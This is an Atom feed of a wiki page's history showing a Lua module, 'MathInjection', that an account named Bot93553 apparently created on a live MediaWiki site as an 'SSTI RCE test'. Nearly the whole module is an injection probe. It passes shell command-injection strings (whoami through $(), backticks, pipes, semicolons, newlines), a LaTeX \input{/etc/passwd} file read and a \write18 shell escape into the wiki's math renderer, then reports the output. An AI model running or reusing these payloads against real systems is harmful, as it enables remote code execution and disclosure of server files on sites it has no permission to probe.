<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="zh-Hans-CN">
	<id>http://120.55.36.65/w/index.php?action=history&amp;feed=atom&amp;title=%E6%A8%A1%E5%9D%97%3AMathInjection</id>
	<title>模块:MathInjection - 版本历史</title>
	<link rel="self" type="application/atom+xml" href="http://120.55.36.65/w/index.php?action=history&amp;feed=atom&amp;title=%E6%A8%A1%E5%9D%97%3AMathInjection"/>
	<link rel="alternate" type="text/html" href="http://120.55.36.65/w/index.php?title=%E6%A8%A1%E5%9D%97:MathInjection&amp;action=history"/>
	<updated>2026-05-14T14:26:14Z</updated>
	<subtitle>本wiki上该页面的版本历史</subtitle>
	<generator>MediaWiki 1.40.0</generator>
	<entry>
		<id>http://120.55.36.65/w/index.php?title=%E6%A8%A1%E5%9D%97:MathInjection&amp;diff=961&amp;oldid=prev</id>
		<title>Bot93553：​SSTI RCE test</title>
		<link rel="alternate" type="text/html" href="http://120.55.36.65/w/index.php?title=%E6%A8%A1%E5%9D%97:MathInjection&amp;diff=961&amp;oldid=prev"/>
		<updated>2026-05-09T05:59:34Z</updated>

		<summary type="html">&lt;p&gt;SSTI RCE test&lt;/p&gt;
&lt;p&gt;&lt;b&gt;新页面&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&lt;br /&gt;
local p = {}&lt;br /&gt;
function p.test(frame)&lt;br /&gt;
    local parent = frame:getParent()&lt;br /&gt;
    if not parent then return &amp;quot;no_parent&amp;quot; end&lt;br /&gt;
&lt;br /&gt;
    local results = {}&lt;br /&gt;
&lt;br /&gt;
    -- Via preprocess&lt;br /&gt;
    local math_payloads = {&lt;br /&gt;
        &amp;quot;baseline&amp;quot;,&lt;br /&gt;
        &amp;quot;\\frac{1}{2}&amp;quot;,&lt;br /&gt;
        &amp;quot;$(whoami 2&amp;gt;&amp;amp;1)&amp;quot;,  -- shell injection&lt;br /&gt;
        &amp;quot;`whoami 2&amp;gt;&amp;amp;1`&amp;quot;,   -- backtick&lt;br /&gt;
        &amp;quot;;whoami 2&amp;gt;&amp;amp;1;&amp;quot;,   -- semicolon&lt;br /&gt;
        &amp;quot;|whoami 2&amp;gt;&amp;amp;1&amp;quot;,    -- pipe&lt;br /&gt;
        &amp;quot;\nwhoami 2&amp;gt;&amp;amp;1\n&amp;quot;, -- newline&lt;br /&gt;
        &amp;quot;\\input{/etc/passwd}&amp;quot;, -- LaTeX file include&lt;br /&gt;
        &amp;quot;\\immediate\\write18{whoami &amp;gt; /tmp/math_rce.txt}&amp;quot;, -- LaTeX shell escape&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
    for i, payload in ipairs(math_payloads) do&lt;br /&gt;
        local wikitext = &amp;quot;&amp;lt;math&amp;gt;&amp;quot; .. payload .. &amp;quot;&amp;lt;/math&amp;gt;&amp;quot;&lt;br /&gt;
        local ok, out = pcall(parent.preprocess, parent, wikitext)&lt;br /&gt;
        results[i] = &amp;quot;math&amp;quot; .. i .. &amp;quot;=&amp;quot; .. tostring(out):sub(1,60)&lt;br /&gt;
    end&lt;br /&gt;
&lt;br /&gt;
    return table.concat(results, &amp;quot; | &amp;quot;)&lt;br /&gt;
end&lt;br /&gt;
return p&lt;/div&gt;</summary>
		<author><name>Bot93553</name></author>
	</entry>
</feed>